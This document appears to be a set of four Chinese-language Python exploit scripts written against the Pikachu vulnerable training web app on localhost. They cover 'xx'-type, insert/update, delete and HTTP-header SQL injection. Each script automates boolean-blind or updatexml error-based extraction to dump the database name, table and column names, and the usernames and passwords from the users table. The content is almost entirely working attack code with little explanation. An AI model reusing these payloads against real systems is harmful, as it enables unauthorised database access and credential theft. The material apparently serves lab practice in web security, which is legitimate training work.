1.xx型注入
python
import requests
# 适配你当前的 sqli_x.php 页面(GET 传参)
url = "http://127.0.0.1/pikachu-master/vul/sqli/sqli_x.php"
def test_basic():
"""先测试正确的闭合方式"""
print("[*] 测试正确的XX型注入闭合方式...")
# 正确payload:闭合括号和单引号,让条件永远为真
payload_true = "') OR 1=1 #"
# 假条件payload
payload_false = "') AND 1=2 #"
# 注意:这里是GET请求,参数要拼在URL里!
r_true = requests.get(url, params={"name": payload_true, "submit": "查询"})
r_false = requests.get(url, params={"name": payload_false, "submit": "查询"})
print(f"[+] 真条件页面长度: {len(r_true.text)}")
print(f"[-] 假条件页面长度: {len(r_false.text)}")
# 打印关键部分,确认是否生效
print("\n[DEBUG] 真条件页面前500字符:")
print(r_true.text[:500])
print("\n[DEBUG] 假条件页面前500字符:")
print(r_false.text[:500])
return len(r_true.text), len(r_false.text)
def is_true(payload, len_true, len_false):
"""布尔判断:用页面长度差来判断"""
# 正确的XX型闭合方式
full_payload = f"') OR {payload} #"
params = {"name": full_payload, "submit": "查询"}
try:
r = requests.get(url, params=params, timeout=5)
# 真条件下页面长度明显更长
return abs(len(r.text) - len_true) < 10
except Exception as e:
print(f"请求错误: {e}")
return False
def dump_data(sql, len_true, len_false):
result = ""
print("正在提取: ", end="", flush=True)
for i in range(1, 50):
left, right = 32, 126
while left <= right:
mid = (left + right) // 2
# 构造条件:截取第i个字符,判断ASCII值是否大于mid
payload = f"ascii(substr(({sql}),{i},1))>{mid}"
if is_true(payload, len_true, len_false):
left = mid + 1
else:
right = mid - 1
if left == 32 or left > 126:
break
result += chr(left)
print(chr(left), end="", flush=True)
print(f"\n提取结果: {result}")
return result
if __name__ == "__main__":
print("="*50)
print("Pikachu XX型SQL注入 布尔盲注 最终版")
print("="*50)
# 第一步:测试闭合方式是否有效
len_true, len_false = test_basic()
if len_true == len_false:
exit("\n[!] 注入未生效,请检查URL和闭合方式!")
# 第二步:脱库
print("\n[1] 提取当前数据库名...")
db_name = dump_data("select database()", len_true, len_false)
print(f"[+] 当前数据库: {db_name}")
print("\n[2] 提取所有表名...")
tables_sql = f"select group_concat(table_name) from information_schema.tables where table_schema='{db_name}'"
tables = dump_data(tables_sql, len_true, len_false)
print(f"[+] 所有表: {tables}")
print("\n[3] 提取users表字段名...")
cols_sql = f"select group_concat(column_name) from information_schema.columns where table_schema='{db_name}' and table_name='users'"
columns = dump_data(cols_sql, len_true, len_false)
print(f"[+] users表字段: {columns}")
print("\n[4] 提取账号密码...")
data_sql = "select group_concat(username,':',password) from users"
data = dump_data(data_sql, len_true, len_false)
print("-"*50)
for line in data.split(','):
if ':' in line:
user, pwd = line.split(':', 1)
print(f"账号: {user:10s} | 密码: {pwd}")
print("-"*50)
print("\n[+] 脱库完成!")2."insert/updata"注入
python
import requests
import re
# ===================== 配置 =====================
url = "http://127.0.0.1/pikachu-master/vul/sqli/sqli_iu/sqli_reg.php"
post_data = {
"username": "",
"password": "123456",
"sex": "boy",
"phonenum": "11111111111",
"email": "test@qq.com",
"address": "test",
"submit": "submit"
}
# ==================================================
def get_part(sql, start, length):
# 分段读取SQL语句,避免updatexml的32字符限制
payload = f"' OR updatexml(1,concat(0x7e,substr(({sql}),{start},{length})),1) OR '"
data = post_data.copy()
data["username"] = payload
try:
r = requests.post(url, data=data, timeout=3)
# 精准匹配报错中的数据部分
match = re.search(r"XPATH syntax error: '~([^~]+)'", r.text)
if match:
return match.group(1)
return ""
except Exception as e:
print(f"请求错误: {e}")
return ""
def get_full(sql, step=20):
"""分段读取完整数据,解决updatexml长度限制"""
full_data = ""
start = 1
while True:
part = get_part(sql, start, step)
if not part:
break
full_data += part
start += step
# 防止无限循环,设置最大长度
if start > 200:
break
return full_data
# ===================== 开始脱库 =====================
print("=" * 65)
print("🔥 PIKACHU INSERT/UPDATE 注入 ")
print("=" * 65)
print("[✅] 数据库名: ", end="")
db_name = get_full("select database()")
print(db_name)
print("[✅] 所有表名: ", end="")
tables = get_full("select group_concat(table_name) from information_schema.tables where table_schema=database()")
print(tables)
print("[✅] users 表字段: ", end="")
columns = get_full("select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'")
print(columns)
print("[✅] 账号密码: ", end="")
account_data = get_full("select group_concat(concat(username,':',password)) from users")
print(account_data)
print("=" * 65)
print("\n🎉 脱库完成!")3."delete"注入
python
import requests
import re
# ===================== DELETE 注入(和你成功脚本逻辑一致) =====================
url = "http://127.0.0.1/pikachu-master/vul/sqli/sqli_del.php"
# 完全模仿你能用的 INSERT 脚本!!!
def get_part(sql, start, length):
# 关键:和你成功的格式一样!!!
payload = f"1 OR updatexml(1,concat(0x7e,substr(({sql}),{start},{length})),1) --+"
try:
# 禁用自动编码!直接拼接 URL!!!这是核心!!
r = requests.get(f"{url}?id={payload}", timeout=3)
match = re.search(r"XPATH syntax error: '~([^~]+)'", r.text)
if match:
return match.group(1)
return ""
except:
return ""
def get_full(sql, step=20):
full_data = ""
start = 1
while True:
part = get_part(sql, start, step)
if not part:
break
full_data += part
start += step
if start > 200:
break
return full_data
# ===================== 脱库 =====================
print("=" * 65)
print("🔥 PIKACHU DELETE 注入 ")
print("=" * 65)
print("[✅] 数据库名: ", end="")
db_name = get_full("database()")
print(db_name)
print("[✅] 所有表名: ", end="")
tables = get_full("select group_concat(table_name) from information_schema.tables where table_schema=database()")
print(tables)
print("[✅] users 表字段: ", end="")
columns = get_full(
"select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'")
print(columns)
print("[✅] 账号密码: ", end="")
account_data = get_full("select group_concat(concat(username,':',password)) from users")
print(account_data)
print("=" * 65)4."http header"注入
python
import requests
import re
# ===================== 配置(适配HTTP Header注入) =====================
url = "http://127.0.0.1/pikachu-master/vul/sqli/sqli_header/sqli_header_login.php"
# 基础POST数据(用户名密码随便填,因为注入点在请求头里)
post_data = {
"username": "admin",
"password": "123456",
"submit": "submit"
}
# ==================================================
def get_part(sql, start, length):
# 分段读取SQL语句,避免updatexml的32字符限制
# 注入点在User-Agent头,Payload和之前格式一致,不需要闭合单引号(看源码一般是单引号)
payload = f"' OR updatexml(1,concat(0x7e,substr(({sql}),{start},{length})),1) OR '"
headers = {
"User-Agent": payload,
"Content-Type": "application/x-www-form-urlencoded"
}
try:
r = requests.post(url, data=post_data, headers=headers, timeout=3)
# 精准匹配报错中的数据部分
match = re.search(r"XPATH syntax error: '~([^~]+)'", r.text)
if match:
return match.group(1)
return ""
except Exception as e:
print(f"请求错误: {e}")
return ""
def get_full(sql, step=20):
"""分段读取完整数据,解决updatexml长度限制"""
full_data = ""
start = 1
while True:
part = get_part(sql, start, step)
if not part:
break
full_data += part
start += step
# 防止无限循环,设置最大长度
if start > 200:
break
return full_data
# ===================== 开始脱库 =====================
print("=" * 65)
print("🔥 PIKACHU HTTP Header 注入 ")
print("=" * 65)
print("[✅] 数据库名: ", end="")
db_name = get_full("select database()")
print(db_name)
print("[✅] 所有表名: ", end="")
tables = get_full("select group_concat(table_name) from information_schema.tables where table_schema=database()")
print(tables)
print("[✅] users 表字段: ", end="")
columns = get_full("select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'")
print(columns)
print("[✅] 账号密码: ", end="")
account_data = get_full("select group_concat(concat(username,':',password)) from users")
print(account_data)
print("=" * 65)
print("\n🎉 HTTP Header注入脱库完成!")